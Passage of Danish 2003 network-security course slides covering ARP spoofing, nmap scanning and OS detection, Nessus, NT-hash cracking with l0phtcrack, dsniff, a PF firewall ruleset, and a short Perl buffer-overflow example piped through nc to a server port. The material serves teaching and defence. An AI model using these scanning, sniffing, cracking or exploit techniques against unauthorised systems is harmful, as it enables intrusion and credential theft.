Windows Server
LinuxServer
c© copyright 2003 PROSA og Security6.net, Henrik Lund Kramshøj 59
Hvad er klokken?
Hvad betydning har det for sikkerheden?
Brug NTP Network Time Protocol paproduktionssystemer
c© copyright 2003 PROSA og Security6.net, Henrik Lund Kramshøj 60
Hvad er klokken? - spørg ICMP
ICMP timestamp option - request/reply
hvad er klokken pa en server
Slayer icmpush - er installeret pa server
viser tidstempel
der findes tilsvarende netmask og info requests
# icmpush -v -tstamp 10.0.0.12ICMP Timestamp Request packet sent to 10.0.0.12 (10.0.0.12)
Receiving ICMP replies ...fischer -> 21:27:17icmpush: Program finished OK
c© copyright 2003 PROSA og Security6.net, Henrik Lund Kramshøj 61
Hvordan virker ARP?
MAC adresser - Ethernet
IP adresser10.0.0.1 10.0.0.2
00:30:65:22:94:a1 00:40:70:12:95:1c
Server Client
c© copyright 2003 PROSA og Security6.net, Henrik Lund Kramshøj 62
Hvordan virker ARP? - 2
ping 10.0.0.2 udført pa server medfører
ARP Address Resolution Protocol request/reply:
• ARP request i broadcast - Who has 10.0.0.2 Tell 10.0.0.1
• ARP reply (fra 10.0.0.2) 10.0.0.2 is at 00:40:70:12:95:1c
IP ICMP request/reply:
• Echo (ping) request fra 10.0.0.1 til 10.0.0.2
• Echo (ping) reply fra 10.0.0.2 til 10.0.0.1
• ...
ARP udføres altid pa Ethernet før der kan sendes IP traffik
(kan være RARP til udstyr der henter en adresse ved boot)
c© copyright 2003 PROSA og Security6.net, Henrik Lund Kramshøj 63
Hvordan virker ARP spoofing?
MAC adresser - Ethernet
IP adresser10.0.0.1 10.0.0.2
00:30:65:22:94:a1 00:40:70:12:95:1c
Server Client10.0.0.2 er på01:02:03:04:05:06
10.0.0.1 er på01:02:03:04:05:06
forfalskede ARP pakker
01:02:03:04:05:06
Hacker
Hackeren sender forfalskede ARP pakker til de to parter
De sender derefter pakkerne ud pa Ethernet med hackerens MACadresse som modtager - han far alle pakkerne
c© copyright 2003 PROSA og Security6.net, Henrik Lund Kramshøj 64
Forsvar mod ARP spoofing
Hvad kan man gøre?
lase MAC adresser til porte pa switche
lase MAC adresser til bestemte IP adresser
Efterfølgende administration!
arpwatch er et godt bud - overvager ARP
bruge protokoller som ikke er sarbare overfor opsamling
c© copyright 2003 PROSA og Security6.net, Henrik Lund Kramshøj 65
Basal Portscanning
Hvad er portscanning
afprøvning af alle porte fra 0/1 og op til 65535
malet er at identificere abne porte - sarbare services
typisk TCP og UDP scanning
TCP scanning er ofte mere palidelig end UDP scanning
TCP handshake er nemmere at identificereUDP applikationer svarer forskelligt - hvis overhovedet
c© copyright 2003 PROSA og Security6.net, Henrik Lund Kramshøj 66
TCP three way handshake
Clientforbinder til en port
Serverlytter på en port
tid
SYN
SYN+ACK
ACK
• TCP SYN half-open scans
• Tidligere loggede systemer kun nar der var etableret en fuld TCP forbindelse - dettekan/kunne udnyttes til stealth-scans
• Hvis en maskine modtager mange SYN pakker kan dette fylde tabellen med abne forbindelserop - og derved afholde nye forbindelser fra at blive oprettet - SYN-flooding
c© copyright 2003 PROSA og Security6.net, Henrik Lund Kramshøj 67
Ping og port sweep
scanninger pa tværs af netværk kaldes for sweeps
Scan et netværk efter aktive systemer med PING
Scan et netværk efter systemer med en bestemt port aben
Er som regel nemt at opdage:
• konfigurer en maskine med to IP-adresser som ikke er i brug
• hvis der kommer trafik til den ene eller anden er det portscan
• hvis der kommer trafik til begge IP-adresser er der nok foretaget et sweep - bedre hvis de toadresser ligger et stykke fra hinanden
c© copyright 2003 PROSA og Security6.net, Henrik Lund Kramshøj 68
nmap port sweep efter port 80/TCP
Port 80 TCP er webservere
# nmap -p 80 217.157.20.130/28
Starting nmap V. 3.00 ( www.insecure.org/nmap/ )Interesting ports on router.kramse.dk (217.157.20.129):Port State Service80/tcp filtered http
Interesting ports on www.kramse.dk (217.157.20.131):Port State Service80/tcp open http
Interesting ports on (217.157.20.139):Port State Service80/tcp open http
Interesting ports on (217.157.20.140):Port State Service80/tcp open http
c© copyright 2003 PROSA og Security6.net, Henrik Lund Kramshøj 69
nmap port sweep efter port 161/UDP
Port 161 UDP er SNMP
# nmap -sU -p 161 217.157.20.130/28
Starting nmap V. 3.00 ( www.insecure.org/nmap/ )Interesting ports on router.kramse.dk (217.157.20.129):Port State Service161/udp open snmp
The 1 scanned port on mail.kramse.dk (217.157.20.130) is: closed
Interesting ports on www.kramse.dk (217.157.20.131):Port State Service161/udp open snmp
The 1 scanned port on (217.157.20.132) is: closed
c© copyright 2003 PROSA og Security6.net, Henrik Lund Kramshøj 70
OS detection
# nmap -O ip.adresse.slet.tet scan af en gatewayStarting nmap 3.48 ( http://www.insecure.org/nmap/ ) at 2003-12-03 11:31 CETInteresting ports on gw-int.catpipe.net (195.249.214.161):(The 1653 ports scanned but not shown below are in state: closed)PORT STATE SERVICE22/tcp open ssh80/tcp open http1080/tcp open socks5000/tcp open UPnPDevice type: general purposeRunning: FreeBSD 4.XOS details: FreeBSD 4.8-STABLEUptime 21.178 days (since Wed Nov 12 07:14:49 2003)Nmap run completed -- 1 IP address (1 host up) scanned in 7.540 seconds
• lavniveau made at identificere operativsystemer pa
• send pakker med anderledes indhold
• Reference: ICMP Usage In Scanning Version 3.0, Ofir Arkin og nmap
c© copyright 2003 PROSA og Security6.net, Henrik Lund Kramshøj 71
Pentest erfaringer hidtil
mange oplysninger
kan man stykke oplysningerne sammen kan man sige en hel del omnetværket
en skabelon til registrering af maskiner er god
• svarer pa ICMP: 2 echo, 2 mask, 2 time
• svarer pa traceroute: 2 ICMP, 2 UDP
• Abne porte TCP:
• Abne porte UDP:
• Operativsystem:
• ... (banner information m.v.)
man skal ofte vurdere nye produkter - sikkerhedsmæssigt og funktion-alitetsmæssigt - yder det beskyttelse, forbedrer det sikkerheden m.v.
c© copyright 2003 PROSA og Security6.net, Henrik Lund Kramshøj 72
Pentest med Nessus
Internet ellerWAN
Nessus klientWindows eller UNIX
Servere der skal testesWindows server2000 Server+IIS
webserver
Andre servere
LANNessusserver UNIX
FirewallTillader kunforbindelse tilNessus server
Nessus er en Open Source scanner
Baseret pa en server og en klient http://www.nessus.org
c© copyright 2003 PROSA og Security6.net, Henrik Lund Kramshøj 73
ISC BIND
Den mest benyttede navneserver pa Internet er BIND
Der findes alternativer, men ingen har samme funktionalitet
http://www.isc.org er adressen til ISC - Internet Software Consortium
konfigurationsfilen er named.conf - for version 8 og 9
Navneservere er tit under angreb, hvorfor?!
• Star pa netværk med god forbindelse
• Har kendte adresser
• Kører oftest ISC BIND
• BIND har mange funktioner - mange fejl
• Den der kontrollerer navneservere kan omdirigere trafik
c© copyright 2003 PROSA og Security6.net, Henrik Lund Kramshøj 74
Eksempel: basalt netværk Security6.net
Internet
firewallSafri
WLAN
Interne netværk10.0.0.0/24
10.0.42.0/24
217.157.20.130
router
Eksterne netværk217.157.20.128/28
217.157.20.129
10.0.0.11
10.0.42.1
Webserver
www.kramse.dkwww.security6.net
www.....dkwwww....net
interne systemer
eksterne systemer
217.157.20.131
c© copyright 2003 PROSA og Security6.net, Henrik Lund Kramshøj 75
NT hashes
NT LAN manager hash værdier er noget man typisk kan samle op inetværk
det er en hash værdi af et password som man ikke burde kunne brugetil noget - hash algoritmer er envejs
opbygningen gør at man kan forsøge brute-force pa 7 tegn ad gangen!
en moderne pc med l0phtcrack kan nemt knække de fleste passwordpa fa dage!
og sikkert 25-30% indenfor den første dag - hvis der ingen politik eromkring kodeord!
c© copyright 2003 PROSA og Security6.net, Henrik Lund Kramshøj 76
l0phtcrack LC4 - The Password Auditing and RecoveryApplication
Consider that at one of the largest technology companies, where policyrequired that passwords exceed 8 characters, mix cases, and includenumbers or symbols...
L0phtCrack obtained 18% of the passwords in 10 minutes90% of the passwords were recovered within 48 hours on a Pentium II/300The Administrator and most Domain Admin passwords were crackedhttp://www.atstake.com/research/lc/
c© copyright 2003 PROSA og Security6.net, Henrik Lund Kramshøj 77
kryptering, PGP og SSL/TLS
kryptering er den eneste made at sikre:
• fortrolighed
• autenticitet
kryptering bestar af:
• Algoritmer - eksempelvis RSA
• protokoller - maden de bruges pa
• programmer - eksempelvis PGP
PGP = mail sikkerhed
Secure Sockets Layer SSL / Transport Layer Services TLS = webser-vere og klienter
c© copyright 2003 PROSA og Security6.net, Henrik Lund Kramshøj 78
firewalls
Basalt set et netværksfilter
Indeholder typisk:
• Grafisk brugergrænseflade til konfiguration - er det en fordel?
• TCP/IP filtermuligheder - pakkernes afsender, modtager, retning ind/ud, porte, protokol, ...
• kun IPv4 for de kommercielle firewalls
• bade IPv4 og IPv6 for Open Source firewalls: IPF, OpenBSD PF, Linux firewalls, ...
• foruddefinerede regler/eksempler - er det godt hvis det er nemt at tilføje/abne en usikkerprotokol?
• typisk NAT funktionalitet indbygget
• typisk mulighed for nogle serverfunktioner: kan agere DHCP-server, DNS caching serverog lignende
En router med Access Control Lists - ACL kaldes ofte netværksfilter, mens endedikeret maskine kaldes firewall - funktionen er reelt den samme - der filtrerestrafik
c© copyright 2003 PROSA og Security6.net, Henrik Lund Kramshøj 79
firewall regelsæt eksempel fra OpenBSD PF
# hostsrouter="217.157.20.129"webserver="217.157.20.131"# Networkshomenet=" 192.168.1.0/24, 1.2.3.4/24 "wlan="10.0.42.0/24"wireless=wi0
# things not usedspoofed=" 127.0.0.0/8, 172.16.0.0/12, 10.0.0.0/16, 255.255.255.255/32 "
block in all # default block anything# loopback and other interface rulespass out quick on lo0 allpass in quick on lo0 all
# egress and ingress filtering - disallow spoofing, and drop spoofedblock in quick from $spoofed to anyblock out quick from any to $spoofed
pass in on $wireless proto tcp from $wlan to any port = 22pass in on $wireless proto tcp from $homenet to any port = 22pass in on $wireless proto tcp from any to $webserver port = 80
pass out quick proto tcp from $homenet to any flags S/S keep statepass out quick proto udp from $homenet to any keep statepass out quick proto icmp from $homenet to any keep state
c© copyright 2003 PROSA og Security6.net, Henrik Lund Kramshøj 80
netdesign - med firewalls
Hvor skal en firewall placeres for at gøre størst nytte?
Hvad er forudsætningen for at en firewall virker?At der er konfigureret et sæt fornuftige regler!
Hvor kommer reglerne fra? Sikkerhedspolitikken!
Kan man lave en 100% sikker firewall? Ja selvfølgelig, se!
Fra http://www.ranum.com/pubs/a1fwall/ The ULTIMATELY Secure Firewall
c© copyright 2003 PROSA og Security6.net, Henrik Lund Kramshøj 81
Afslutning
Hvordan forhindrer man angreb via Internet?
Det kan man ikke!
Hvordan beskytter man sig sa bedst muligt?
• Ved at tænke langsigtet
• Arbejde metodisk og malrettet
• signere sine breve og data, modifikation kan ikke foretages uden nøglen
• Man skal kræve at samarbejdspartnere bruger kryptering
• Sa fa abninger til Internet - typisk abne services pa servere
• holde opsyn med sin computer - ligesom man gør med sine andre ejendele - husk backup
Husk: IT-sikkerhed er ikke kun netværkssikkerhed!
c© copyright 2003 PROSA og Security6.net, Henrik Lund Kramshøj 82
Spørgsm al?
Henrik Lund Kramshøj, CISSP og cand.scient
www.security6.net
sikkerhed, netværk, IPv6 og UNIX.
I er altid velkomne til at sende spørgsmal pa e-mail
De efterfølgende slides er baggrundsmateriale.
c© copyright 2003 PROSA og Security6.net, Henrik Lund Kramshøj 83
Anbefalinger
Oversigt over anbefalinger
Følg med! - læs websites, bøger, artikler, mailinglister, ...
Vurder altid sikkerhed - skal integreres i processer
Hændelsesh andtering - du vil komme ud for sikkerhedshændelser
Lav en sikkerhedspolitik - herunder software og e-mail politik
Hver m aned offentliggøres ca. 100 nye s arbarheder iprodukter - software/hardware
c© copyright 2003 PROSA og Security6.net, Henrik Lund Kramshøj 84
Følg med! - der er mange kilder til information
websites prøv at kigge bade pa officielle/kommercielle websites -men ogsa indimellem pa de sma gyder pa Internet
bøger der er en god liste over MUST READ sikkerhedsbøger paadressenhttp://sun.soci.niu.edu/˜rslade/mnbksccd.htm
artikler mange steder, men eksempelvis www.securityfocus.com
mailinglister leverandør ejede lister og generelle - som bugtraq ogfull-disclosure
personer der findes personer pa Internet som beskæftiger sig medbestemte emner - kan være en god ide at følge med i deresartikler og websites. Eksempelvis: Bruce Schneier crypto-gramhttp://www.counterpane.com/crypto-gram.html
c© copyright 2003 PROSA og Security6.net, Henrik Lund Kramshøj 85
Reklamer: kursusafholdelse
Security6.net afholder følgende kurser med mig som underviser
• IPv6 workshop - 1 dagIntroduktion til Internetprotokollerne og forberedelse til implementering i egne netværk. Inter-netprotokollerne har eksisteret i omkring 20 ar, og der er kommet en ny version kaldet version6 af disse - IPv6.
• Wireless teknologier og sikkerhed workshop - 1 dagEn dag med fokus pa netværksdesign og fornuftig implementation af tradløse netværk ogintegration med eksempelvis hjemmepc og wirksomhedens netværk
• Hacker workshop 3 dageWorkshop med detaljeret gennemgang af hackermetoderne angreb over netværk, exploitpro-grammer, portscanning, Nessus m.fl.
• Forensics workshop 2 dageMed fokus pa tilgængelige open source værktøjer gennemgas metoder og praksis af un-dersøgelse af diskimages og spor pa computer systemer
c© copyright 2003 PROSA og Security6.net, Henrik Lund Kramshøj 86
Dug Song dsniff
Dug Song dsniff er et program der kan opfange data fra netværket ogafkode indholdet - det eller lignende programmer installeres ofte pahackede systemer
Dsniff kræver adgang til pakkerne fra systemet, skal derfor installerespa systemet der skal infiltreres eller pa netværksvejen
• Dsniff kan afkode følgende protokoller:FTP, Telnet, SMTP, HTTP, POP, poppass, NNTP, IMAP, SNMP, LDAP, Rlogin, RIP, OSPF,PPTP MS-CHAP, NFS, VRRP, YP/NIS, SOCKS, X11, CVS, IRC, AIM, ICQ, Napster, Post-greSQL, Meeting Maker, Citrix ICA, Symantec pcAnywhere, NAI Sniffer, Microsoft SMB, Ora-cle SQL*Net, Sybase and Microsoft SQL protocols.
Dug Song Dsniff - http://monkey.org/˜dugsong/dsniff/
c© copyright 2003 PROSA og Security6.net, Henrik Lund Kramshøj 87
Hackerværktøjer
• nmap - http://www.insecure.org portscanner
• Nessus - http://www.nessus.org automatiseret testværktøj
• l0phtcrack - http://www.atstake.com/research/lc/ - The Password Auditing and Recovery Ap-plication
• Ethereal - http://www.ethereal.com avanceret netværkssniffer
• OpenBSD - http://www.openbsd.org operativsystem med fokus pa sikkerhed
• http://www.isecom.org/ - Open Source Security Testing Methodology Manual - gennemgangaf elementer der bør indga i en struktureret test
• Putty - http://www.chiark.greenend.org.uk/˜sgtatham/putty/download.html terminal emulatormed indbygget SSH
c© copyright 2003 PROSA og Security6.net, Henrik Lund Kramshøj 88
Hvordan bruges hackerværktøjerne effektivt?
Tænk som en hacker
Rekognoscering• ping sweep
• portscan
• OS detection - TCP/IP eller banner grab
• Servicescan - rpcinfo, netbios, ...
• telnet/netcat interaktion med services
Udnyttelse/afprøvning: Nessus, whisker, exploit programs
Oprydning• Lav en rapport
• Gennemga rapporten, registrer ændringer
• Opdater programmer, konfigurationer, arkitektur, osv.
I skal jo ogsa VISE andre at I gør noget ved sikkerheden.
c© copyright 2003 PROSA og Security6.net, Henrik Lund Kramshøj 89
Privilegier
Hvorfor afvikle applikationer med administrationsrettigheder - hvis derkun skal læses fra eksempelvis en database?
least privilege betyder at man afvikler kode med det mest restriktivesæt af privileger - kun lige nok til at opgaven kan udføres .
Dette praktiseres ikke i webløsninger i Danmark - eller meget fa steder
privilege escalation er nar man pa en eller anden vis opnar højereprivileger pa et system, eksempelvis som følge af fejl i programmerder afvikles med højere privilegier. Derfor HTTPD servere pa UNIXafvikles som nobody - ingen specielle rettigheder.
En angriber der kan afvikle vilkarlige kommandoer kan ofte finde ensarbarhed som kan udnyttes lokalt - fa rettigheder = lille skade
c© copyright 2003 PROSA og Security6.net, Henrik Lund Kramshøj 90
buffer overflows et C problem
Et buffer overflow er det der sker nar man skriver flere data end derer afsat plads til i en buffer, et dataomrade. Typisk vil programmet ganed, men i visse tilfælde kan en angriber overskrive returadresser forfunktionskald og overtage kontrollen.
Stack protection er et udtryk for de systemer der ved hjælp af oper-ativsystemer, programbiblioteker og lign. beskytter stakken med re-turadresser og andre variable mod overskrivning gennem buffer over-flows. StackGuard og Propolice er nogle af de mest kendte.
c© copyright 2003 PROSA og Security6.net, Henrik Lund Kramshøj 91
Exploits - udnyttelse af s arbarheder
exploit/exploitprogram er
• et program
• udnytter eller demonstrerer en sarbarhed
• rettet mod et specifikt system.
• kan være 5 linier eller flere sider
• Meget ofte Perl eller et C program
Eksempel:
#! /usr/bin/perl# ./chars.pl | nc server 31337print "abcdefghijkl";print chr(237);print chr(13);print chr(220);print chr(186);print "\n";
c© copyright 2003 PROSA og Security6.net, Henrik Lund Kramshøj 92
local vs. remote exploits
local vs. remote angiver om et exploit er rettet mod en sarbarhedlokalt pa maskinen, eksempelvis opna højere privilegier, eller bereg-net til at udnytter sarbarheder over netværk
remote root exploit - den type man frygter mest, idet det er et exploitprogram der nar det afvikles giver angriberen fuld kontrol, root user eradministrator pa UNIX, over netværket.
zero-day exploits dem som ikke offentliggøres - dem som hackereholder for sig selv. Dag 0 henviser til at ingen kender til dem førde offentliggøres og ofte er der umiddelbart ingen rettelser til desarbarheder
c© copyright 2003 PROSA og Security6.net, Henrik Lund Kramshøj 93
Referencer: Internet links
Internet links:
• 1984 kampagnen - http://www.1984.dk
• Sikkerhedsforum DK - http://www.sikkerhedsforum.dk/
• Privatliv.net - http://www.privatliv.net/
• Dug Song Dsniff - http://monkey.org/˜dugsong/dsniff/
• Ethereal - http://www.ethereal.org
• CERT Computer Emergency Response Team - http://www.cert.org
• CIAC - http://www.ciac.org/ciac/
• SANS - http://www.sans.org
• COAST/CERIAS hotlist - http://www.cerias.purdue.edu/infosec/hotlist/
• http://www.packetfactory.net - diverse projekter relateret til pakker og IP netværk
• http://www.project.honeynet.org - diverse honeynet projekter information om pakker og IPnetværk
• http://www.isecom.org/ - Open Source Security Testing Methodology Manual - Hvordan laverman struktureret test!
c© copyright 2003 PROSA og Security6.net, Henrik Lund Kramshøj 94
Relevante bøger om sikkerhed
• CISSP All-in-One Exam Guide, Shon Harris anden udgave McGraw-Hill Osborne Media,2003
• Building Open Source Network Security Tools, Mike D. Schiffman, Wiley 2003
• Firewalls and Internet Security, Cheswick, Bellovin og Rubin, Addison-Wesley, 2nd edition,2003
• Network Intrusion Detection, Stephen Northcutt og Judy Novak, New Riders, 2nd edition,2001
• Intrusion Signatures and Analysis, Stephen Northcutt et al, New Riders, 2001
• Hacking Exposed, Scambray et al, 4th edition, Osborne, 2003
• bøger om TCP/IP - Alle bøger af Richard W Stevens kan anbefales!
c© copyright 2003 PROSA og Security6.net, Henrik Lund Kramshøj 95
Putty en SSH til Windows
• Man kan hente Putty programmet frahttp://www.chiark.greenend.org.uk/˜sgtatham/putty/download.html
• Grafisk Secure Copy til Windows - WinSCP http://winscp.sourceforge.net/
c© copyright 2003 PROSA og Security6.net, Henrik Lund Kramshøj 96